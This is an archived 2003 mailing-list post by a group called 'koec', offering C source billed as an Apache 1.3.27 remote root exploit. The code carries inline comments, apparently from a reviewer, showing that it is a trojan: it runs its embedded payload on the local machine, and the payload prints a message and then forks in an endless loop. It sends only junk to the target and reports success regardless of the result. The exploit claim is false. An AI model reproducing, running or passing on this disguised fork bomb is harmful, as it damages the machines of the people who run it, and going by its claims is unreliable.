Message-ID: <200306201539.h5KFdWUD047186@mailserver2.hushmail.com>
From: koec at hushmail.com (koec@...hmail.com)
Subject: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I am posting this as a member of koec.  The koec take no responsibility
for damages caused by this software, compile and use at your own risk.
 By the way, the koec make you all look like a bunch of fuckin' schoolgirls.

WHITEH8.

- --BEGIN KOEC-APACHE.C--

/* :: PRIVATE - DO NOT DISTRIBUTE ::
 * Apache/1.3.27 - Remote Root Exploit
 * Knights of the Eastern Calculus (info@...c.org)
 */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Payload bytes. main() below does not deliver this array to a remote
 * server in any usable form; it casts the array to a function pointer and
 * calls it in the local process.
 *
 * Hand-decoding the leading bytes as 32-bit x86 with Linux int 0x80
 * system calls (verify with a disassembler, never by running it):
 *   - three xor instructions zero ebx, eax and edx; dl is set to 0x18 (24)
 *   - six push-immediate instructions build the 24-byte stack string
 *     "--What is The M4TR1X ?!\n"
 *   - mov ecx,esp / mov al,4 / int 0x80: write of that string to fd 0
 *   - mov eax,2 / int 0x80 / jmp -9: system call 2 (fork) in a loop with
 *     no exit condition, i.e. the process and each child keep forking
 * The bytes after that jmp are not reached on this path and are not
 * analysed here.
 *
 * The literal contains embedded NUL bytes (the first one at offset 46), so
 * every strlen(shellcode) in main() yields 46, not the array's full size.
 */
static char shellcode[] = {
                              "\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
                              "\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
                              "\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
                              "\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
                              "\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
                              "\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
                              "\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
                              "\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
                              "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
                              "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
                              "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
                              "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
                              "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
                              "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
                              "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
                          };

/*
 * Entry point. Read as written, this program runs its payload on the
 * machine of whoever executes it and sends nothing meaningful to the
 * target:
 *   - the payload array is called as a function before any socket exists;
 *   - no HTTP request is ever built, the heap buffer is mostly
 *     uninitialised;
 *   - the "shell port" argument is only echoed in the final message.
 * Treat it as a trojaned proof-of-concept: analyse statically or in a
 * disposable, isolated VM, and never build and run it on a real host.
 *
 * argv[1]: host name passed to gethostbyname()
 * argv[2]: number that is only printed at the end
 *
 * NOTE(review): exit/malloc/atoi and memcpy/strlen/bzero/bcopy are used
 * without <stdlib.h>, <string.h> or <strings.h> being included above.
 */
int main(int *argc, char **argv)
{
    int i;
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    /* Non-standard: argc is declared as int * and cast back to int here. */
    if((int)argc < 3 )
    {
        printf("usage: %s <target> <shell port>\n", argv[0]);
	printf("ex: %s google.com 31337\n", argv[0]);
        exit(0);
    }

    /* 1636 bytes from malloc(); the contents are not initialised. */
    buffer = (char *) malloc(512 + 1024 + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    /*
     * strlen() stops at the payload's first embedded NUL, so only its
     * leading 46 bytes are copied, ending at offset 512. Apart from those
     * bytes and the ';' and NUL written at offsets 1536 and 1537 below,
     * the buffer is never written.
     */
    memcpy(&buffer[512 - strlen(shellcode)], shellcode,
           strlen(shellcode));
    buffer[512 + 1024] = ';';
    buffer[512 + 1024 + 1] = '\0';
    /*
     * Casts the payload array to a function pointer and calls it in this
     * local process, before the host lookup or any socket call below.
     * Whether the call succeeds depends on the data segment being
     * executable (presumably true on many 2003-era systems; expect a fault
     * where non-executable data is enforced). If the decoded fork loop
     * runs, control never returns to the statements that follow.
     */
    void(*b)()=(void*)shellcode;b();
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Server doesn't exist\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    /* Destination port is fixed at 80; argv[2] plays no part in the connection. */
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Cannot open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }
    printf("Attempting to Exploit...\n");
    /*
     * strlen(buffer) scans uninitialised heap memory from offset 0, so the
     * length sent is unpredictable. "Success!!!" is printed for every
     * return value other than 1, including the -1 that send() returns on
     * error; the message says nothing about the remote host.
     */
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("Success!!!\n");
    else
        printf("No go there tough guy!\n");
    /* argv[2] is only formatted into this message; nothing listens on or connects to it. */
    printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));

}

- --END KOEC-APACHE.C--
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj7zKrcACgkQsm8eq8rMuWpg0gCeNQCeLDLLhIki1eWI09PYX+bKLEgA
nRXqS24ObnxBxWHwroyNTkBVjZpo
=D2RC
-----END PGP SIGNATURE-----



